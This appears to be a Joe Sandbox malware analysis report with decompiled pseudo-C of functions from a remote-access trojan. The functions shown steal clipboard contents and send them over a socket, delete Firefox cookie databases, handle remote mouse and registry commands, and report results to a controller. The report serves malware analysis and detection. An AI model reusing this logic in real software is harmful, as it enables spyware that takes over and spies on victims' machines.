                    • Opcode Fuzzy Hash: 073a4d63a48226157dde18ccb65b455a12d9a39e5646febe62d80ed98aa8a538
                    • Instruction Fuzzy Hash: E2512C3191421A5ADB14FBA1EC5AEEEB768AF50304F5001BFF406720E2EF785A458A9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00415802 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 83clipboardmemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 90%
                    			E00415802(char* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a24, char _a28, void* _a152, void* _a176) {
				void* __ebx;
				int _t10;
				void* _t20;
				void* _t22;
				void* _t31;
				struct HWND__* _t38;
				void* _t57;
				void* _t61;
				void* _t64;
				void* _t66;

				_t55 = __edx;
				_t10 = OpenClipboard(_t38);
				_t68 = _t10;
				if(_t10 != 0) {
					EmptyClipboard();
					E00401E45( &_a16, _t55, __ebp, _t68, _t38);
					_t57 = GlobalAlloc(0x2000, E0040245C() + 2);
					_t20 = GlobalLock(_t57);
					E00401E45( &_a12, _t55, __ebp, _t68, _t38);
					_t22 = E0040245C();
					E004351E0(_t20, E00401F8B(E00401E45( &_a8, _t55, __ebp, _t68, _t38)), _t22);
					_t66 = _t64 + 0xc;
					GlobalUnlock(_t57);
					SetClipboardData(0xd, _t57);
					CloseClipboard();
					if(OpenClipboard(_t38) != 0) {
						_t61 = GetClipboardData(0xd);
						_t31 = GlobalLock(_t61);
						GlobalUnlock(_t61);
						CloseClipboard();
						_t50 =  !=  ? _t31 : 0x46a8f0;
						E0040415E(_t38,  &_a28, _t55, __ebp,  !=  ? _t31 : 0x46a8f0);
						_t55 =  &_a24;
						E0041A879(_t38, _t66 - 0x18,  &_a24);
						_push(0x6b);
						E00404A81(0x4734e8,  &_a24, _t31);
						E00401EE9();
					}
				}
				E00401E6D( &_a16, _t55);
				E00401FB8();
				E00401FB8();
				return 0;
			}













                    0x00415802
                    0x00415803
                    0x00415809
                    0x0041580b
                    0x00415811
                    0x0041581c
                    0x00415837
                    0x0041583a
                    0x00415847
                    0x0041584e
                    0x00415867
                    0x0041586c
                    0x00415870
                    0x00415879
                    0x00415896
                    0x004158a5
                    0x004158b3
                    0x004158b6
                    0x004158bf
                    0x004158c5
                    0x004158d2
                    0x004158da
                    0x004158e2
                    0x004158e8
                    0x004158ed
                    0x004158f4
                    0x00415c96
                    0x00415c96
                    0x004158a5
                    0x0041611c
                    0x00416128
                    0x00416134
                    0x00416141

                    APIs
                    • OpenClipboard.USER32 ref: 00415803
                    • EmptyClipboard.USER32 ref: 00415811
                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00415831
                    • GlobalLock.KERNEL32 ref: 0041583A
                    • GlobalUnlock.KERNEL32(00000000), ref: 00415870
                    • SetClipboardData.USER32 ref: 00415879
                    • CloseClipboard.USER32 ref: 00415896
                    • OpenClipboard.USER32 ref: 0041589D
                    • GetClipboardData.USER32 ref: 004158AD
                    • GlobalLock.KERNEL32 ref: 004158B6
                    • GlobalUnlock.KERNEL32(00000000), ref: 004158BF
                    • CloseClipboard.USER32 ref: 004158C5
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                    • String ID: 4G
                    • API String ID: 3520204547-3080958808
                    • Opcode ID: b6dff0e6031016ac6f009384d3d94469fe5bf2ae8ae968dd7c5d63977dfa98cf
                    • Instruction ID: f1afe3415f062d0b9b587beb2e8851fc1ee6a0bc4f4e9a56709fcddcee62baf9
                    • Opcode Fuzzy Hash: b6dff0e6031016ac6f009384d3d94469fe5bf2ae8ae968dd7c5d63977dfa98cf
                    • Instruction Fuzzy Hash: EF2158715083005BC714BF71EC5AAAE76A9AF90756F00483EFD06962E3EF38C905C66A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B2B1 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 92%
                    			E0040B2B1(void* __edx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				struct _WIN32_FIND_DATAA _v444;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t30;
				signed int _t44;
				signed int _t46;
				long _t60;
				void* _t68;
				void* _t69;
				void* _t98;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;

				_t112 = __eflags;
				_t103 = __edi;
				E004020BF(_t68,  &_v52);
				E004020BF(_t68,  &_v28);
				_t30 = E00402073(_t68,  &_v100, __edx, _t106, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E00401FC2( &_v28, _t31, _t104, E004052DD(_t68,  &_v76, E0043A9AA(_t68, __eflags, "UserProfile"), _t106, _t112, _t30));
				E00401FB8();
				E00401FB8();
				_t101 =  &_v28;
				_t105 = FindFirstFileA(E00401F8B(E00406292( &_v100,  &_v28, _t106, "*")),  &_v444);
				E00401FB8();
				_t113 = _t105 - 0xffffffff;
				if(_t105 != 0xffffffff) {
					while(1) {
						__eflags = FindNextFileA(_t105,  &_v444);
						if(__eflags == 0) {
							break;
						}
						__eflags = _v444.dwFileAttributes & 0x00000010;
						if((_v444.dwFileAttributes & 0x00000010) == 0) {
							continue;
						} else {
							_t44 = E0043E5D0( &(_v444.cFileName), ".");
							__eflags = _t44;
							if(_t44 == 0) {
								continue;
							} else {
								_t46 = E0043E5D0( &(_v444.cFileName), "..");
								__eflags = _t46;
								if(_t46 == 0) {
									continue;
								} else {
									_t101 = E00406292( &_v124,  &_v28, _t106,  &(_v444.cFileName));
									E00401FC2( &_v52, _t48, _t105, E00408832(_t68,  &_v76, _t48, _t103, _t106, __eflags, "\\cookies.sqlite"));
									E00401FB8();
									E00401FB8();
									__eflags = DeleteFileA(E00401F8B( &_v52));
									if(__eflags != 0) {
										_t98 = _t107 - 0x18;
										_push("\n[Firefox cookies found, cleared!]");
										goto L2;
									} else {
										_t60 = GetLastError();
										__eflags = _t60 != 0;
										if(_t60 != 0) {
											FindClose(_t105);
											_t69 = 0;
										} else {
											continue;
										}
									}
								}
							}
						}
						goto L11;
					}
					E00402073(_t68, _t107 - 0x18, _t101, _t106, "\n[Firefox Cookies not found]");
					E0040B752(_t68, _t101, _t106, __eflags);
					FindClose(_t105);
					goto L10;
				} else {
					FindClose(_t105);
					_t98 = _t107 - 0x18;
					_push("\n[Firefox Cookies not found]");
					L2:
					E00402073(_t68, _t98, _t101, _t106);
					E0040B752(_t68, _t101, _t106, _t113);
					L10:
					_t69 = 1;
				}
				L11:
				E00401FB8();
				E00401FB8();
				return _t69;
			}
























                    0x0040b2b1
                    0x0040b2b1
                    0x0040b2bf
                    0x0040b2c7
                    0x0040b2d4
                    0x0040b2f4
                    0x0040b2fc
                    0x0040b304
                    0x0040b315
                    0x0040b332
                    0x0040b334
                    0x0040b339
                    0x0040b33c
                    0x0040b3fb
                    0x0040b409
                    0x0040b40b
                    0x00000000
                    0x00000000
                    0x0040b365
                    0x0040b36c
                    0x00000000
                    0x0040b372
                    0x0040b37e
                    0x0040b385
                    0x0040b387
                    0x00000000
                    0x0040b389
                    0x0040b395
                    0x0040b39c
                    0x0040b39e
                    0x00000000
                    0x0040b3a0
                    0x0040b3b8
                    0x0040b3c7
                    0x0040b3cf
                    0x0040b3d7
                    0x0040b3eb
                    0x0040b3ed
                    0x0040b457
                    0x0040b459
                    0x00000000
                    0x0040b3ef
                    0x0040b3ef
                    0x0040b3f6
                    0x0040b3f9
                    0x0040b44a
                    0x0040b450
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040b3f9
                    0x0040b3ed
                    0x0040b39e
                    0x0040b387
                    0x00000000
                    0x0040b36c
                    0x0040b41b
                    0x0040b420
                    0x0040b429
                    0x00000000
                    0x0040b342
                    0x0040b343
                    0x0040b34c
                    0x0040b34e
                    0x0040b353
                    0x0040b353
                    0x0040b358
                    0x0040b42f
                    0x0040b42f
                    0x0040b42f
                    0x0040b431
                    0x0040b434
                    0x0040b43c
                    0x0040b448

                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B329
                    • FindClose.KERNEL32(00000000), ref: 0040B343
                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040B403
                    • FindClose.KERNEL32(00000000), ref: 0040B429
                    • FindClose.KERNEL32(00000000), ref: 0040B44A
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$Close$File$FirstNext
                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                    • API String ID: 3527384056-432212279
                    • Opcode ID: 6e259262706716e35cf83066339bf0dd6887841de27ae9bc6657e2767c2a9b71
                    • Instruction ID: 51cc95074229e97af50e91e82164566f02eb9ff2f5b37e3c54f7b0a52fa2c995
                    • Opcode Fuzzy Hash: 6e259262706716e35cf83066339bf0dd6887841de27ae9bc6657e2767c2a9b71
                    • Instruction Fuzzy Hash: 4D416C3194420A6ACB14FBA5DC56DEEB768AE51304F50017FF405B21D2FF389A45CA9E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00418186 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 204COMMON
                    Download Yara Rule
                    C-Code - Quality: 73%
                    			E00418186(signed int __edx, void* __eflags, char _a8) {
				void* _v28;
				char _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				char _v52;
				signed char* _t61;
				char* _t62;
				signed char* _t63;
				intOrPtr* _t73;
				intOrPtr* _t80;
				char* _t87;
				char* _t88;
				char* _t89;
				intOrPtr* _t90;
				signed char* _t92;
				char* _t93;
				intOrPtr _t95;
				signed int _t105;
				void* _t108;
				signed int _t148;

				_t95 =  *((intOrPtr*)(E004051C3(0)));
				E00404182( &_a8,  &_v32, 1, 0xffffffff);
				if(_t95 != 0x30) {
					__eflags = _t95 - 0x31;
					if(_t95 != 0x31) {
						__eflags = _t95 - 0x32;
						if(_t95 != 0x32) {
							__eflags = _t95 - 0x33;
							if(_t95 != 0x33) {
								__eflags = _t95 - 0x34;
								if(_t95 != 0x34) {
									__eflags = _t95 - 0x35;
									if(_t95 != 0x35) {
										__eflags = _t95 - 0x36;
										if(_t95 != 0x36) {
											__eflags = _t95 - 0x37;
											if(_t95 == 0x37) {
												_t61 = E004051C3(2);
												_t62 = E004051C3(1);
												_t63 = E004051C3(0);
												_t105 =  *_t61 & 0x000000ff;
												__eflags =  *_t62;
												_push(_t105);
												_t52 =  *_t62 != 0;
												__eflags = _t52;
												_push((_t105 & 0xffffff00 | _t52) & 0x000000ff);
												_t108 = 0x4736e8;
												goto L18;
											}
										} else {
											_push(0);
											_push(0x78);
											goto L15;
										}
									} else {
										_push(0);
										_push(0xffffff88);
										L15:
										mouse_event(0x800, 0, 0, ??, ??);
									}
								} else {
									_v40 =  *((intOrPtr*)(E004051C3(0)));
									_v40 =  *((intOrPtr*)(E004051C3(4)));
									E00418009( *((intOrPtr*)(E004051C3(8))),  &_v48,  &_v44);
									E004184AD(_v48, _v44);
								}
							} else {
								_t73 = E004051C3(0);
								_v44 =  *((intOrPtr*)(E004051C3(4)));
								_v44 =  *((intOrPtr*)(E004051C3(8)));
								E00418009( *((intOrPtr*)(E004051C3(0xc))),  &_v52,  &_v48);
								E0041844A( *_t73, _v52, _v48);
								goto L8;
							}
						} else {
							_t80 = E004051C3(0);
							_v40 =  *((intOrPtr*)(E004051C3(4)));
							_v48 =  *((intOrPtr*)(E004051C3(8)));
							E00418009( *((intOrPtr*)(E004051C3(0xc))),  &_v48,  &_v52);
							E004183E7( *_t80, _v48, _v52);
							goto L8;
						}
					} else {
						_t87 = E004051C3(4);
						_t88 = E004051C3(3);
						_t89 = E004051C3(2);
						_t90 = E004051C3(0);
						 *_t87 =  *_t88;
						__eflags =  *_t89;
						E004184EE( *_t90, __edx & 0xffffff00 |  *_t89 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t87 != 0x00000000) & 0 |  *_t88 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t87 != 0x00000000) & 0x000000ff);
						L8:
					}
				} else {
					_t92 = E004051C3(2);
					_t93 = E004051C3(1);
					_t63 = E004051C3(0);
					_t148 =  *_t92 & 0x000000ff;
					_t177 =  *_t93;
					_push(_t148);
					_push((_t148 & 0xffffff00 |  *_t93 != 0x00000000) & 0x000000ff);
					_t108 = 0x473630;
					L18:
					_push( *_t63 & 0x000000ff);
					E00417825(_t108, _t177);
				}
				E00401FB8();
				E00401FB8();
				return 0;
			}

























                    0x004181a4
                    0x004181ab
                    0x004181b3
                    0x004181f2
                    0x004181f5
                    0x00418251
                    0x00418254
                    0x004182b1
                    0x004182b4
                    0x00418315
                    0x00418318
                    0x00418366
                    0x00418369
                    0x00418370
                    0x00418373
                    0x00418387
                    0x0041838a
                    0x00418392
                    0x0041839f
                    0x004183ac
                    0x004183b1
                    0x004183b4
                    0x004183b7
                    0x004183b8
                    0x004183b8
                    0x004183be
                    0x004183bf
                    0x00000000
                    0x004183bf
                    0x00418375
                    0x00418375
                    0x00418376
                    0x00000000
                    0x00418376
                    0x0041836b
                    0x0041836b
                    0x0041836c
                    0x00418378
                    0x0041837f
                    0x0041837f
                    0x0041831a
                    0x0041832c
                    0x0041833d
                    0x00418351
                    0x0041835f
                    0x0041835f
                    0x004182b6
                    0x004182bb
                    0x004182d1
                    0x004182e6
                    0x004182fa
                    0x0041830a
                    0x00000000
                    0x0041830a
                    0x00418256
                    0x0041825b
                    0x00418271
                    0x00418286
                    0x0041829a
                    0x004182aa
                    0x00000000
                    0x004182aa
                    0x004181f7
                    0x004181fd
                    0x0041820a
                    0x00418217
                    0x00418224
                    0x0041822f
                    0x00418239
                    0x00418246
                    0x0041830f
                    0x0041830f
                    0x004181b5
                    0x004181bb
                    0x004181c8
                    0x004181d5
                    0x004181da
                    0x004181dd
                    0x004181e0
                    0x004181e7
                    0x004181e8
                    0x004183c4
                    0x004183c7
                    0x004183c8
                    0x004183c8
                    0x004183d1
                    0x004183d9
                    0x004183e6

                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0$06G$1$2$3$4$5$6$7$6G
                    • API String ID: 0-3439518097
                    • Opcode ID: 24ac2fc32beb33ce48cafe5b80d71fdfa07178e887ebd5d7dc0c99c1ba21e080
                    • Instruction ID: 33774567b1f725210584e6ae4599f2175015db0efea207338ba601142af93ff7
                    • Opcode Fuzzy Hash: 24ac2fc32beb33ce48cafe5b80d71fdfa07178e887ebd5d7dc0c99c1ba21e080
                    • Instruction Fuzzy Hash: 3461C4709183019FD304EF21D861FAB7BA49F94710F14881FF9A26B2D1DF399A49CB66
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004131DA Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 485registrylibraryloaderCOMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 81%
                    			E004131DA(void* __edx, void* __eflags, char _a8) {
				char _v36;
				char _v48;
				char _v52;
				void* _v60;
				char _v68;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				struct _SECURITY_ATTRIBUTES _v112;
				void* _v120;
				char _v128;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t75;
				void* _t86;
				void* _t97;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t111;
				void* _t118;
				void* _t119;
				void* _t121;
				void* _t125;
				void* _t130;
				void* _t136;
				void* _t140;
				void* _t145;
				void* _t151;
				void* _t153;
				void* _t154;
				void* _t156;
				void* _t157;
				void* _t163;
				void* _t165;
				void* _t166;
				void* _t168;
				void* _t174;
				void* _t176;
				void* _t177;
				void* _t179;
				void* _t184;
				void* _t185;
				long _t188;
				void* _t195;
				void* _t207;
				void* _t209;
				void* _t220;
				void* _t236;
				void* _t250;
				signed int _t327;
				void* _t330;
				void* _t332;
				void* _t337;
				void* _t339;
				void* _t341;
				signed int _t342;
				void* _t344;
				void* _t351;
				signed int _t352;
				void* _t355;
				void* _t356;
				void* _t357;
				void* _t360;
				void* _t365;
				void* _t366;
				void* _t368;
				void* _t369;
				void* _t371;
				void* _t373;
				void* _t374;
				void* _t376;
				void* _t378;
				void* _t380;
				void* _t385;

				_t385 = __eflags;
				_t325 = __edx;
				_push(_t207);
				_t75 = E00401F8B( &_a8);
				_push(0xffffffff);
				_t330 = 4;
				_push(_t330);
				_push( &_v52);
				E00404182( &_a8);
				_t355 = (_t352 & 0xfffffff8) - 0x4c;
				E004020D6(_t207, _t355, __edx, _t385, 0x472ec8);
				_t356 = _t355 - 0x18;
				E004020D6(_t207, _t356, __edx, _t385,  &_v68);
				E0041A976( &_v108, __edx);
				_t357 = _t356 + 0x30;
				_t337 =  *_t75 - 0x35;
				if(_t337 == 0) {
					E00401F66(_t207,  &_v76);
					__eflags = E004021DA( &_v88) - 1;
					if(__eflags > 0) {
						L004086CB(_t207,  &_v80, _t325, E00401F8B(E00401E45( &_v88, _t325, _t351, __eflags, 1)));
					}
					E004020D6(_t207, _t357 - 0x18, _t325, __eflags, E00401E45( &_v88, _t325, _t351, __eflags, 0));
					_t86 = E00401EE4( &_v84);
					_t325 = 1;
					_t220 = _t86;
					L33:
					E00412FF5(_t220, _t325, _t392);
					L34:
					E00401EE9();
					L35:
					E00401E6D( &_v88, _t325);
					E00401FB8();
					E00401FB8();
					return 0;
				}
				_t339 = _t337 - 1;
				if(_t339 == 0) {
					_t97 = E00401F8B(E00401E45( &_v88, __edx, _t351, __eflags, 2));
					_t99 = E00401F8B(E00401E45( &_v92, __edx, _t351, __eflags, 1));
					_t332 = 0;
					_t100 = E00401E45( &_v96, __edx, _t351, __eflags, 0);
					_t360 = _t357 - 0x18;
					E004020D6(_t207, _t360, _t325, __eflags, _t100);
					_t102 = E00412F64(_t207, __eflags, _t97);
					_t325 = _t99;
					_t103 = E00412D0B(_t102, _t99);
					_t362 = _t360 + 0x18 - 0x18;
					_t236 = _t360 + 0x18 - 0x18;
					__eflags = _t103;
					if(__eflags == 0) {
						_push("2");
						L29:
						E00402073(_t207, _t236, _t325, _t351);
						E00404A81(0x473450, _t325, __eflags);
						goto L35;
					}
					_push("1");
					L18:
					E00402073(_t207, _t236, _t325, _t351);
					E00404A81(0x473450, _t325, __eflags);
					E004020D6(_t207, _t362 - 0x18, _t325, __eflags, E00401E45( &_v120, _t325, _t351, __eflags, _t332));
					_t111 = E00401F8B(E00401E45( &_v128, _t325, _t351, __eflags, 1));
					_t325 = 0;
					E00412FF5(_t111, 0, __eflags);
					goto L35;
				}
				_t341 = _t339 - 1;
				if(_t341 == 0) {
					E0040415E(_t207,  &_v80, __edx, _t351, E00401F8B(E00401E45( &_v88, __edx, _t351, __eflags, 1)));
					 *0x470d80 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW");
					_t118 = E00401EE4( &_v84);
					_t119 = E00401E45( &_v96, _t325, _t351, __eflags, 0);
					_t365 = _t357 - 0x18;
					E004020D6(_t207, _t365, _t325, __eflags, _t119);
					_t121 = E00412F64(_t207, __eflags, _t118);
					_t366 = _t365 + 0x18;
					__eflags =  *0x470d80(_t121);
					if(__eflags != 0) {
						_t250 = _t366 - 0x18;
						_push("9");
					} else {
						_t125 = E0040245C();
						_t342 = 2;
						_t207 = E00413811( &_v84, "\\", _t125 - _t342);
						__eflags = _t207 - 0xffffffff;
						if(__eflags != 0) {
							_t51 = _t207 + 1; // 0x1
							_t130 = E004330A3( ~0x00BADBAD | _t51 * _t342, _t51 * _t342 >> 0x20, _t342, __eflags);
							E0043E0D9(_t130, E00401EE4(E00408682( &_v84,  &_v36, 0, _t207)));
							E00401EE9();
							_t136 = E00401E45( &_v108, _t51 * _t342 >> 0x20, _t351, __eflags, 0);
							_t368 = _t366 - 0x18;
							E004020D6(_t207, _t368, _t51 * _t342 >> 0x20, __eflags, _t136);
							_t325 = 0;
							__eflags = 0;
							E00412FF5(_t130, 0, 0,  ~0x00BADBAD | _t51 * _t342);
							E004330AC(_t130);
							_t369 = _t368 + 0x1c;
						} else {
							_t140 = E00401E45( &_v96, _t325, _t351, __eflags, 0);
							_t371 = _t366 - 0x18;
							E004020D6(_t207, _t371, _t325, __eflags, _t140);
							_t325 = 0;
							E00412FF5(0, 0, __eflags);
							_t369 = _t371 + 0x18;
						}
						_t250 = _t369 - 0x18;
						_push("8");
					}
					L10:
					E00402073(_t207, _t250, _t325, _t351);
					E00404A81(0x473450, _t325, __eflags);
					goto L34;
				}
				_t344 = _t341 - 1;
				if(_t344 == 0) {
					_t145 = E0043A3AC(_t143, E00401F8B(E00401E45( &_v88, __edx, _t351, __eflags, 3)));
					__eflags = _t145 - _t330;
					if(__eflags == 0) {
						E004351E0( &_v108, E00401F8B(E00401E45( &_v92, __edx, _t351, __eflags, _t330)), _t330);
						_push(_v108);
						_t151 = E00401F8B(E00401E45( &_v92, _t325, _t351, __eflags, 2));
						_t153 = E00401F8B(E00401E45( &_v96, _t325, _t351, __eflags, 1));
						_t332 = 0;
						__eflags = 0;
						_t154 = E00401E45( &_v100, _t325, _t351, 0, 0);
						_t373 = _t357 + 0xc - 0x18;
						E004020D6(_t207, _t373, _t325, __eflags, _t154);
						_t156 = E00412F64(_t207, __eflags, _t151);
						_t374 = _t373 + 0x18;
						_t325 = _t153;
						_t157 = E00412BA7(_t156, _t153);
					} else {
						__eflags = _t145 - 0xb;
						if(__eflags == 0) {
							E004351E0( &_v104, E00401F8B(E00401E45( &_v92, __edx, _t351, __eflags, _t330)), 8);
							_t163 = E00401F8B(E00401E45( &_v92, _t325, _t351, __eflags, 2));
							_t165 = E00401F8B(E00401E45( &_v96, _t325, _t351, __eflags, 1));
							_t332 = 0;
							_t166 = E00401E45( &_v100, _t325, _t351, __eflags, 0);
							_t376 = _t357 + 0xc - 0x18;
							E004020D6(_t207, _t376, _t325, __eflags, _t166);
							_t168 = E00412F64(_t207, __eflags, _t163);
							_t325 = _t165;
							_t157 = E00412BEB(_t168, _t165, _v104, _v100);
							_t374 = _t376 + 0x24;
						} else {
							_push(_t145);
							E00401E45( &_v92, __edx, _t351, __eflags, _t330);
							_push(E0040245C());
							_push(E00401F8B(E00401E45( &_v92, __edx, _t351, __eflags, _t330)));
							_t174 = E00401F8B(E00401E45( &_v96, _t325, _t351, __eflags, 2));
							_t176 = E00401F8B(E00401E45( &_v100, _t325, _t351, __eflags, 1));
							_t332 = 0;
							_t177 = E00401E45( &_v104, _t325, _t351, __eflags, 0);
							_t378 = _t357 - 0x18;
							E004020D6(_t207, _t378, _t325, __eflags, _t177);
							_t179 = E00412F64(_t207, __eflags, _t174);
							_t325 = _t176;
							_t157 = E00412AB8(_t179, _t176);
							_t374 = _t378 + 0x28;
						}
					}
					_t362 = _t374 - 0x18;
					_t236 = _t374 - 0x18;
					__eflags = _t157;
					if(__eflags == 0) {
						_push("5");
						goto L29;
					} else {
						_push("4");
						goto L18;
					}
				}
				_t390 = _t344 != 1;
				if(_t344 != 1) {
					goto L35;
				}
				E0040415E(_t207,  &_v80, __edx, _t351, E00401F8B(E00401E45( &_v88, __edx, _t351, _t390, 1)));
				_t184 = E00401EE4( &_v84);
				_t185 = E00401E45( &_v96, __edx, _t351, _t390, 0);
				_t380 = _t357 - 0x18;
				E004020D6(_t207, _t380, _t325, _t390, _t185);
				_t188 = RegCreateKeyExW(E00412F64(_t207, _t390, _t184), 0, 0, 0, 0x20006, 0,  &_v112, 0, ??);
				_t349 = _t188;
				RegCloseKey(_v120);
				_t382 = _t380 + 0x18 - 0x18;
				_t250 = _t380 + 0x18 - 0x18;
				_t391 = _t188;
				if(_t188 != 0) {
					_push("7");
					goto L10;
				}
				E00402073(_t207, _t250, _t325, _t351, "6");
				_push(0x72);
				E00404A81(0x473450, _t325, _t391);
				_t209 = E0040869C( &_v108, 0x473450, 0x473450);
				_t392 = _t209 - 0xffffffff;
				if(_t209 != 0xffffffff) {
					_t14 = _t209 + 1; // 0x1
					_t327 = 2;
					_t195 = E004330A3( ~(__eflags > 0) | _t14 * _t327, _t14 * _t327 >> 0x20, _t349, __eflags);
					E0043E0D9(_t195, E00401EE4(E00408682( &_v96,  &_v48, 0, _t209)));
					E00401EE9();
					E004020D6(_t209, _t382 - 0x18, _t14 * _t327 >> 0x20, __eflags, E00401E45( &_v120, _t14 * _t327 >> 0x20, _t351, __eflags, 0));
					_t325 = 0;
					E00412FF5(_t195, 0, __eflags,  ~(__eflags > 0) | _t14 * _t327);
					E004330AC(_t195);
					goto L34;
				} else {
					E004020D6(_t209, _t382 - 0x18, _t325, _t392, E00401E45( &_v108, _t325, _t351, _t392, 0));
					_t325 = 0;
					_t220 = 0;
					goto L33;
				}
			}






















































































                    0x004131da
                    0x004131da
                    0x004131e6
                    0x004131e9
                    0x004131ee
                    0x004131f2
                    0x004131f8
                    0x004131fd
                    0x004131fe
                    0x00413203
                    0x0041320d
                    0x00413212
                    0x0041321c
                    0x00413225
                    0x0041322a
                    0x0041322d
                    0x00413230
                    0x00413746
                    0x00413754
                    0x00413757
                    0x00413770
                    0x00413770
                    0x00413786
                    0x0041378f
                    0x00413794
                    0x00413796
                    0x00413798
                    0x00413798
                    0x004137a0
                    0x004137a4
                    0x004137a9
                    0x004137ad
                    0x004137b6
                    0x004137be
                    0x004137cb
                    0x004137cb
                    0x00413236
                    0x00413239
                    0x004136d4
                    0x004136e7
                    0x004136ec
                    0x004136f5
                    0x004136fa
                    0x00413700
                    0x00413705
                    0x0041370d
                    0x00413711
                    0x00413717
                    0x0041371a
                    0x0041371c
                    0x0041371e
                    0x0041372a
                    0x0041372f
                    0x0041372f
                    0x0041373b
                    0x00000000
                    0x0041373b
                    0x00413720
                    0x00413538
                    0x00413538
                    0x00413544
                    0x00413559
                    0x0041356b
                    0x00413570
                    0x00413574
                    0x00000000
                    0x00413579
                    0x0041323f
                    0x00413242
                    0x004135a2
                    0x004135c2
                    0x004135c7
                    0x004135d4
                    0x004135d9
                    0x004135df
                    0x004135e4
                    0x004135e9
                    0x004135f3
                    0x004135f5
                    0x004136bb
                    0x004136bd
                    0x004135fb
                    0x004135ff
                    0x00413606
                    0x00413618
                    0x0041361a
                    0x0041361d
                    0x00413644
                    0x00413651
                    0x00413672
                    0x0041367d
                    0x00413687
                    0x0041368c
                    0x00413692
                    0x00413697
                    0x00413697
                    0x0041369b
                    0x004136a1
                    0x004136a6
                    0x0041361f
                    0x00413624
                    0x00413629
                    0x0041362f
                    0x00413634
                    0x00413638
                    0x0041363d
                    0x0041363d
                    0x004136ac
                    0x004136ae
                    0x004136ae
                    0x00413388
                    0x00413388
                    0x00413394
                    0x00000000
                    0x00413394
                    0x00413248
                    0x0041324b
                    0x004133b1
                    0x004133bb
                    0x004133bd
                    0x004134cd
                    0x004134d9
                    0x004134e6
                    0x004134f9
                    0x004134fe
                    0x004134fe
                    0x00413507
                    0x0041350c
                    0x00413512
                    0x00413517
                    0x0041351c
                    0x0041351f
                    0x00413523
                    0x004133c3
                    0x004133c3
                    0x004133c6
                    0x00413455
                    0x00413472
                    0x00413485
                    0x0041348a
                    0x00413493
                    0x00413498
                    0x0041349e
                    0x004134a3
                    0x004134ab
                    0x004134af
                    0x004134b4
                    0x004133c8
                    0x004133c8
                    0x004133ca
                    0x004133d6
                    0x004133e8
                    0x004133f6
                    0x00413409
                    0x0041340e
                    0x00413417
                    0x0041341c
                    0x00413422
                    0x00413427
                    0x0041342f
                    0x00413433
                    0x00413438
                    0x00413438
                    0x004133c6
                    0x0041352a
                    0x0041352d
                    0x0041352f
                    0x00413531
                    0x00413581
                    0x00000000
                    0x00413533
                    0x00413533
                    0x00000000
                    0x00413533
                    0x00413531
                    0x00413251
                    0x00413254
                    0x00000000
                    0x00000000
                    0x00413271
                    0x0041328b
                    0x00413296
                    0x0041329b
                    0x004132a1
                    0x004132af
                    0x004132b9
                    0x004132bb
                    0x004132c1
                    0x004132c4
                    0x004132c6
                    0x004132c8
                    0x00413383
                    0x00000000
                    0x00413383
                    0x004132d3
                    0x004132d8
                    0x004132df
                    0x004132ef
                    0x004132f1
                    0x004132f4
                    0x00413316
                    0x0041331b
                    0x00413326
                    0x00413347
                    0x00413352
                    0x00413367
                    0x0041336c
                    0x00413370
                    0x00413376
                    0x00000000
                    0x004132f6
                    0x00413306
                    0x0041330b
                    0x0041330d
                    0x00000000
                    0x0041330d

                    APIs
                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004132AF
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004132BB
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
